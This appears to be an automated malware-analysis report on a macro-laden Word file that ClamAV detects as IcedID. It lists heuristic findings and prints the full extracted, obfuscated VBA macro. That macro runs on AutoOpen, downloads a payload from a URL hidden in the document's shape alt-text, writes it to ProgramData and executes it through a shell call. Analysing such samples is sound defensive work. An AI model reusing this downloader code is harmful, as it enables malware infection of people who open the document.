MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set YTgwJ = CreateObject(IpGWg + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set mWhIR = VBA.CreateObject(cEBVE + "" + bTZMa) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13697 bytes |
SHA-256: 0c01ae3e69a76be8888ff065088452ecbda0a45cef3c63b067a96bff029866e2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "oEwNi"
Sub dXuJB(RhRhe, Optional ByVal dKRlY As String = "c:\programdata\slKnb.txt", Optional ByVal bTZMa As String = "systemobject")
' Cationic frightens blocks froze overfeed omnivores
' Junior
' Discards everybody piteously sandals stepson broadminded
' Wordier
' Napkin raked latency sigma inkpot
' Necessarily rifling
' Quip crashland prosecutorial breakfasting
' Balms statically receivable
' Franker shrinkable
' Forgo act interlude sawing
' Noticeboard cobblers expiatory
' Treatises wheeze rouse
' Skippering anatomists caged
' Showplace underlain banquets
' Overfly magnesia
' Daytime donjuan methyl tanking
' Creel signatories quizzed giddiest embrasure subhuman
' Loads xenophobe benzene maple
' Stormy exacted compounds nitrogenous scourged
' Sterilisation rhetorical vet essence perspective
' Bring oleander evolved
' Trouper lamplit snort narrated beatification
' Essentials arrowed microfilming elixirs shave
' Apprehension profiteering deducting
' Starring quick
' Duplicator spiritless freakish palmist scoutmaster marginalia
' Forester sparsest sprites minty demolished
' Chary gulp fatherland
' Unquestionable sabbatical
Set mWhIR = VBA.CreateObject(cEBVE + "" + bTZMa)
' Sectored supplicating
' Curled acquiescent polytopes hairdressers
' Bridling
' Discomfort gumtrees vortexes caressed transmogrify
' Tankage illumine
' Boreal paned vision patterns
Set XbXNG = mWhIR.CreateTextFile(dKRlY)
' Defer accrue fray
' Dockers stagings elevate nimbly confided plods
' Probity revoking
' Rusting
' Flustered manacles miraculousness radiographer horizontals
' Anarchistic bradawl likens depicted
XbXNG.WriteLine RhRhe
' Copes increases
' Involve anarchists climbdown unsalted
' Playgrounds extort
' Longitudinally victimisation panga pirating
' Wrongdoing floppy mutter acetal
' Received
' Chest
' Odd objecting tentatively many cobalt
XbXNG.Close
' Unseat anthologise wait
' Organic dignified fornicates putsch extraneous grizzlier corroborative
' Batches robberies
' Recalculated cob
' Aurevoir lobbyist childlessness petard
' Bisexual lineage aliases decline
' Patent sparing anchors
' Ticking midnight biospheres
' Chesty gate herons modelled
' Foully mermaid enjoyments waited
' Skittle riviera squareness relocations
' Protuberance penurious genomic smallholdings instructions principality
' Echidnas feathered courageous
' Creations overdue plopped
' Revs asunder
' Decoy distinctness squatter untying snuff hotrod
' Unrefereed pekan fertilisation sketcher
' Eigenstate gritted gaseous
' Gustiest disqualifying
' Surreptitiously dizziness trails sahib tattooed
' Resettling thumbscrews unprofitable suspicion nourishment
' Deists pedigree
' Paralyse deficiency anachronistic evading wiring exult
' Wobbliest upholstery decomposed unmoving
' Swivelling bargepole cabinets
' Legally adjourn
' Quaffing
' Flour follow along probabilist
' Humouring serenader
' Subsystem calve regresses
' Seats rosettes
' Teacups contacted trickled orientated
' Hostage troublemaker imitation pitilessly elucidate
' Hushhush antisymmetry exploration
' Idols
' Fornicated provisioned sensitiveness structure expanding flare
' Exercises airlifting
' Pensions compere diseased molluscs manipulators
' Squawk persecute womanliness cosiest
' Devaluing festered litigate lodgement clown bellowed
' Simulations stoning silted emergencies
End Sub
' Creases dived transvestism knuckle voyage misprinting
' Paddler sociologists unkind
' Hackneyed
' Iced
' Styluses ureters saddlebag
' Budapest cornfields discussion poult oinks acclimatised
Sub AutoOpen()
' Laundress downtrodden
' Annotate linguistics
' Perambulating belatedness annexations prostate
' Scarce crosswind
' Goad buzzard stainer freighters darns
' Chainsaws repudiate abolishes swivels
' Uncurled premised streptococcal bitterness
' Personage spear lebanon salmonella
' Disestablishment conscription supremal trapdoors sociably
' Sorrel fizzles keyboardist disengagement
' Fatalistic hydrology timekeeper
' Phoenixes damply lithium pivoting
' Deputation eagerness seasoner candidatures weightlifting angriest
' Foursome hereabouts
' Primal subsidised
' Potter prickliest multiplexers lotions fishes
' Genocidal newsworthy smashing wows speaks
' Flippancy descriptiveness bias
' Fettered allegations outlines
' Disputation enquired venerating reign ferment
' Agitators proofread pewter
' Pages satellite
' Deadlier insist
' Devouring
' Prophesying nutrient ravaging capitulated conductress disengaged pap
' Officiousness
' Protecting meritocracy porch igloo
' Grinner pellet umlauts corners
' Arctic goalkeeper
Dim XhfGF As New eoykq
' Roe displeased
' Soilings overdrafts
' Pumas hawaiian
' Bipartite jawbone frigidly
' Subtitles grapnel
QOJSu = ""
' Buyer hereafter flab rink
' Cups capture pins blabber enforceability
' Upgradeable ave occults pinned
' Hyphenates utmost
' Mean slop
' Lichis stylishly hurdler
' Silliness snips makeover
' Discolouration
' Blueprints parry captious
RhRhe = XhfGF.mMJZJ(vawiH)
' Titfortat novelty
' Charles stigmatised dunghill
' Irrecoverable infiltrator documenting stigmatised
' Chorus
' Ached eggs reckless
' Enquired reckoning
dXuJB hmWYt(RhRhe)
' Talked drowned
' Blockading illhumoured handlers reunited
' Blowtorches stipulation disassemble sledges
' Initialise aggravation commune
' Apnoea antonyms commutativity
' Amigo assists midwinter sustainably
' Sizing abridgement reputable pathologies occupationally
' Deviating jingled chromium luckiest
' Sweeps authorise scandal belles
' Pandemonium screen rotating heath
WMwzL QhMhx(0) + "vr32 c:\programdata\slKnb.txt", "wscript"
End Sub
Function bcfHU(eAlgD, omfzV)
' Attempts yellowing flashbacks litres
' Rearranged
' Teheran curtailment tonight eerier unfelt
' Stretchers jaywalking fingertip etymologists
' Erecter restrict famines begins shatters
bcfHU = Split(eAlgD, omfzV)
End Function
Attribute VB_Name = "DEimG"
' Unlovable mandrill
' Vegetation stripes prolific comma threshold
' Factitious tumbling esthetic palmtop
' Beryllium besides bleeps producers
Function hmWYt(KbMSv)
' Trampled grandparents
' Taped anthropomorphism charitable
' Condensers emancipate
' Germ
' Villager steepness fabricates shoebox
' Misogynistic treasure
' Nears permissibility oppose absorb
hmWYt = StrConv(KbMSv, vbUnicode)
' Professionalised refutes failing countenances unresponsiveness safeguarding fullscale
' Strippers nodular echoing
' Reasons presupposing italic updating reawaken
' Toady storeys
' Sadden
' Bittiness inscriptions tahiti
End Function
' Gratifyingly sinfulness brunei
' Sputtered basics estates
' Switchboard marring alienation ramification accidence
' Contriving thawing malaise
Function ldbog()
' Gestural textiles pioneer modest
' Effectiveness neglecting handcuffed
' Division maizes piny shocking
' Blinder ennoble gruelling olympiad
' Ejected sympathetic ballistics
' Streaky geomorphologists encrusting resins strike shallot
' Staircase bungled stroll adult
' Highish diplomatic antiparticles unfathomed
' Juggernaut odometer gangly unusual
' Candidates youthful retted workout
' Goalkeepers creditably
' Liberalisation impresses legionnaires tranquilly
With ActiveDocument.shapes(1)
ldbog = .AlternativeText
End With
End Function
' Blindness thrombosis recent option tabled
' Eyepatch capriole reinstated mallards
' Gunman flaunts yip invaluable
' Lightheaded cataclysmic
' Disjunctions ineptness juxtaposition gibberish french scantiness
' Declare twirls
' Whiff urbanisation turgidity tonsure
Function QhMhx(WiADR)
' Commodities interpersonal asps
' Whisperers
' Modulations
' Mistyped coats growls
' Contested outboard farthing
' Animism banners sourced
' Subsumes observed punnet
' Daydream manufactures choppier
' Snub athletes muddier vocabulary
yzgiU = bcfHU(ldbog(), "~~~")
NnkvJ = yzgiU(WiADR)
QhMhx = NnkvJ
End Function
Attribute VB_Name = "eoykq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ysbxd(kuITJ, GXbma, qiwBd)
' Orthogonal valves agglomerations founder expropriation glycol
' Ignominy
' Mythology rework
' Pugilist sheepdog lymphoid massed perversion
' Bosun commoner curve
ysbxd = Mid(kuITJ, GXbma, qiwBd)
End Function
Public Function UXUKm(uDrFD, aOFGE)
' Crowd frameup kiloton
' Bookkeeper trance absorbers forgo cares
' Confronting lefthanders buckskin token
' Diggings marriage travails beguiled
' Pulping vicarious demonstratives
' Lase dispersers debtor
' Minuet rubbishing actinides ballerina
' Goggles needier multitude shrewdness
' Nuzzles leopardskin occasion deaden caterwaul
' Season
' Magnetometers relapses
' Amoebic so fiery spokespeople
' Gen harmonics overlaid chaffing
' Camelhair
' Studs compacts epitaxy precariously abhorrent electronically
' Decapitated linked limes
KmUqm = Trim(uDrFD)
For PNaST = aOFGE To Len(KmUqm)
PEKPJ = ysbxd(KmUqm, PNaST, aOFGE) & PEKPJ
Next PNaST
UXUKm = PEKPJ
End Function
' Poisonous alertness launching
' Scuttled comely concatenates bleaker
' Deputed soon order imperturbable hardier vertebrate scything suppressing
' Categorically pancreas cleanser workweek allot trisector
' Contexts minds enunciate googly stargazing
' Laburnum
' Trigs disbandment patriotic
Function mMJZJ(fAVnB)
' Deflate academical
' Lawnmower elastic tress severity
' Navigational barbarous ghostlier
' Wooing purportedly mademoiselle say
' Unperceived averse hustles alder
Dim jTsdl As Object
' Juddered
' Conifer foolhardy recognise showroom
' Sequinned stalwart detested tramway cursed scrawny
' Unexpectedly ritualised waken
' Ironwork sloppy starlike caryatids
' Fortifying adviser
' Schwas antihistamines
' Servicemen indifferently upcast diphtheria recommend indistinctly cruise
' Interfere proscribe mansions patrol
Set jTsdl = CreateObject(UXUKm(fAVnB, 1) + "." + UXUKm(fAVnB, 1) + "Request.5.1")
' Ovations nominative infamously unreadability numbered
' Outwits differs convicting waive
' Radiocarbon counterpane dismissible ant cloaking
' Unrest
' Telaviv hitters sackful iambic
' Inalienable acetylene
' Fairway composer manages dialled bagpipe grenades
' Cutout
' Belches nines netted underdeveloped
' Disaster
' Unfounded
' Occasionally rephrases setting loyalists tall
' Easting tomes blowfly idleness navvy purling
' Apothecary suave
' Enrobe
' Binocular boudoir weigh
' Retarding squiggles bleach heels
' Emptiest
' Overcomplexity
' Sadsack chroniclers
RBokp = QhMhx(1)
' Escarp hardpressed hearty
' Mugs wretches
' Cherryred chromosome headrest osteoarthritis concoction campanile physicians
' Economist blowdried
' Earthshaking ply bowdlerised teenagers
' Parsnip
jTsdl.Open "GET", UXUKm(RBokp, 1), False
' Snugger provocations
' Airsick hefting unabsorbed precedents husbandry tabloids
' Auk applicative hobble upcast
' Calcify pause edged
' Poodle eyelet implode preps tilling chromatograph unquenchable
jTsdl.Send
' Underwrites jonah muted transactional
' Apposition name stroking estuaries
' Occurrence sunglasses
' Crick
mMJZJ = jTsdl.responsebody
End Function
Attribute VB_Name = "ZSMJY"
Public Const vawiH As String = "ptthniw"
Public Const cEBVE As String = "scripting.file"
Sub WMwzL(OUpyd, IpGWg)
' Biometric hexane abbeys mechanic
' Fodder correctors phenomenologists bunkum messier
' Arrivals
' Childish toothpaste
Set YTgwJ = CreateObject(IpGWg + "." + "shell")
' Esteemed sleep demolish
' Males unheard sweetens
' Straining characterless
' Mazy spangles crucifixion diffusive
' Putter modulate drenched
' Sprayed scandalise
' Palindromes millipedes
' Keystone purgative supersede regained probabilistically
' Lengthwise terrifically
' Paradise adoption screechier certain
' Clearheaded damage greasing even shank postdated
' Nightingales unaffectedly rashly hotter
' Acceptances imperialistic camelot caging unwind lump
' Rents screenplay groundnut fly
' Cowsheds discarding reassessed housing
' Typesetter tab assessors mockery agronomists
' Variations maroons chlorate bottles
' Hellish nearer prepare massive
' Inapplicability disclaim draftee wetted
' Cardiff marathons
' Unfeasible absented reserver falconry
' Backwash
' Generosities years barrages flora locals
' Quadratures repeating antiaircraft
' Dredging peacemaking employment lizards
' Prepays dissuades
' Yet placates powering circumnavigational rhino
' Typed crueler vamper flood
' Fattens recirculated puffiness vaulting cook
' Unless precipitates unwashed relegation
' Midweek bacteriophage twines embroiled
' Apaches harem fascism whizkids
' Promissory surmount mutiny legislated resurrected siamese imprinting
' Transform grassland traversal frequent
' Ministerially
' Workmanlike presumptuousness defter
' Occupier
' Stripier deadlocking arrowhead
' Humourless maps bole
Call YTgwJ.exec(OUpyd)
' Dragged demagogue adulterating
' Salute psychotherapists
' Infect sensations tough brigadiers manure
' Closets join squirrelled springclean
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |
SHA-256: a53409a8e4d283f175dcba6e290d6337a288afe54159b2ea702e22a4d9509bfd |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.